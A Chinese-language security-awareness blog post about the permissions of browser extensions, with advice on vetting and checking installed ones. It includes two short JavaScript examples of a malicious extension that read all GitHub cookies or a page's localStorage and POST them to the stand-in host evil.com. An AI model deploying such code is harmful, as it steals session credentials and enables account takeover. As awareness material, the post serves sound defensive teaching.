别再无脑装插件了!你的浏览器扩展可能正在“偷家”
过去很长一段时间,我几乎什么浏览器插件都敢装:调试、翻译、抓包、下载、效率提升……直到我拆了一款热门“资源分享”类扩展的代码,才真正意识到:很多扩展拥有的权限,几乎等同于在你的浏览器里放了一个“贴身代理”。 很多人还停留在“插件 ≈ 一个小工具”层面,但从权限模型看,它们可以做到的远超你的想象。
目的:本文科普浏览器扩展权限风险、攻击面、审查方法与应急处置。所有示例仅用于安全意识教育,禁止用于任何非法用途。
起因是我分析一款“资源整合分享”类插件,发现它在后台脚本里枚举指定站点所有 Cookie,再混淆打包上传。它用到的 API 全部是“合法”扩展接口;代码还做了层层混淆,普通用户根本不会注意。
这让我开始系统梳理:浏览器插件究竟能拿到多少“你以为安全”的东西?
理论上可以:
读取你所有网页的内容
获取所有Cookie、localStorage,包括登录状态
监听你在网页上的操作(比如输入、点击)
注入自己的脚本,甚至“劫持”你的页面
远程把这些数据上传到第三方服务器
页面脚本受 document.cookie 限制,而浏览器插件调用 chrome.cookies.getAll 走的是浏览器内部特权接口,不受 document.cookie 限制。
前提:
manifest 声明 cookies 权限
host_permissions 匹配域或 <all_urls>
没有被企业策略额外隔离
所以:HttpOnly 防的是 XSS 读取,不防“被你自己安装的特权扩展”。
举个简单的例子,如果你登录了某个重要网站(比如GitHub、公司后台),插件是可以直接拿到你的登录Cookie的,然后在别的地方“复现”你的登录状态,直接控制你的账号!
恶意插件示例(最小代码示例,仅警示用途)
省略Manifest配置...
// background.js - 恶意插件示例(仅用于提醒目的)
chrome.cookies.getAll({ domain: "github.com" }, function(cookies) {
fetch("https://evil.com/api/upload", {
method: "POST",
body: JSON.stringify(cookies)
});
});
这段代码的意思就是,把你在GitHub的所有Cookie都打包上传到远程恶意服务器上。只要你装了这个插件,哪怕你自己啥都没做,你的登录状态就已经被"偷家"了!
更可怕的:localStorage劫持
插件还可以注入脚本到你所在的网站,然后获取你的localstorage,上传到恶意服务器上
// 注入到目标网站的恶意脚本
chrome.scripting.executeScript({
target: {tabId: tabId},
func: () => {
const data = {};
// 获取localStorage
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
if (key) {
data[key] = localStorage.getItem(key);
}
}
fetch('https://evil.com/upload', {
method: 'POST',
body: JSON.stringify(data)
});
}
});
而且很多插件会用混淆、加密等方式隐藏自己的恶意行为,一般用户根本发现不了。
1. 谨慎安装插件
只从官方应用商店下载,不要去第三方网站下载插件
查看插件权限请求
阅读用户评价和评分
避免安装来源不明的插件
2. 检查插件权限
在地址栏输入: chrome://extensions/
找到对应插件
点击"详情"
查看"权限"部分
以Adblock Plus为例,这是一个免费的广告拦截器:它的权限可以读取所有网站上的数据
继续点击网站设置可以看到其他的权限:
结论: 这个是全球用户量很大的开源插件,在Chrome商店也可以直接下载,但如果从事特殊工作的话还是不建议安装这类高权限插件。
删除不再使用的插件
检查插件的更新记录
关注插件开发者的信誉
启用安全浏览模式
定期清理浏览器数据
使用无痕模式处理敏感操作
如果发现恶意插件,立即执行以下步骤:
Chrome插件安全是一个需要持续关注的话题。通过本指南,你应该能够:
识别:了解插件权限系统,识别潜在风险
防护:选择安全可靠的插件,避免恶意软件
检测:检查现有插件安全性
应对:发现问题时知道如何正确处理
最后提醒:重要操作时使用浏览器无痕模式
参考文章:原文链接
